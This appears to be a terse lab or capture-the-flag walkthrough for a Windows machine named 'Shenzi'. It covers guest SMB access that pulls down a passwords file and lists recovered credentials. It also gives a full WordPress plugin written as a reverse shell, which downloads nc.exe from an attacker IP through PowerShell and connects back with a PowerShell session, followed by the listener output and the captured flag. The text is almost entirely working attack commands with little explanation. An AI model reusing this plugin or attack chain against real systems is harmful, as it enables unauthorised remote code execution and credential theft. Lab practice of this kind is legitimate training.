Foothold

$ smbclient '\\192.168.189.55\Shenzi' -U Guest%''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu May 28 10:45:09 2020
  ..                                  D        0  Thu May 28 10:45:09 2020
  passwords.txt                       A      894  Thu May 28 10:45:09 2020
  readme_en.txt                       A     7367  Thu May 28 10:45:09 2020
  sess_klk75u2q4rpgfjs3785h6hpipp      A     3879  Thu May 28 10:45:09 2020
  why.tmp                             A      213  Thu May 28 10:45:09 2020
  xampp-control.ini                   A      178  Thu May 28 10:45:09 2020

		12941823 blocks of size 4096. 4833339 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \passwords.txt of size 894 as passwords.txt (5.5 KiloBytes/sec) (average 5.5 KiloBytes/sec)
getting file \readme_en.txt of size 7367 as readme_en.txt (45.8 KiloBytes/sec) (average 25.5 KiloBytes/sec)
getting file \sess_klk75u2q4rpgfjs3785h6hpipp of size 3879 as sess_klk75u2q4rpgfjs3785h6hpipp (23.8 KiloBytes/sec) (average 25.0 KiloBytes/sec)
getting file \why.tmp of size 213 as why.tmp (1.3 KiloBytes/sec) (average 19.1 KiloBytes/sec)
getting file \xampp-control.ini of size 178 as xampp-control.ini (1.1 KiloBytes/sec) (average 15.5 KiloBytes/sec)
smb: \> exit

FeltHeadwallWight357
ppmax2011
wampp

wp-admin    

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

system("powershell -c curl http://192.168.45.239/nc.exe -o C:\\programdata\\nc.exe");
system("C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe");
?>

$ zip shell.zip shell.php          
  adding: shell.php (deflated 37%)

$ nc -lnvp 1337

$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.189.55] 51270
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\xampp\htdocs\shenzi\wp-admin> whoami
whoami
shenzi\shenzi
PS C:\xampp\htdocs\shenzi\wp-admin> type C:\Users\shenzi\Desktop\local.txt
type C:\Users\shenzi\Desktop\local.txt
e2cf3ca7c0a48e6e2258c74db7f5080a
PS C:\xampp\htdocs\shenzi\wp-admin> ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.189.55
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.189.254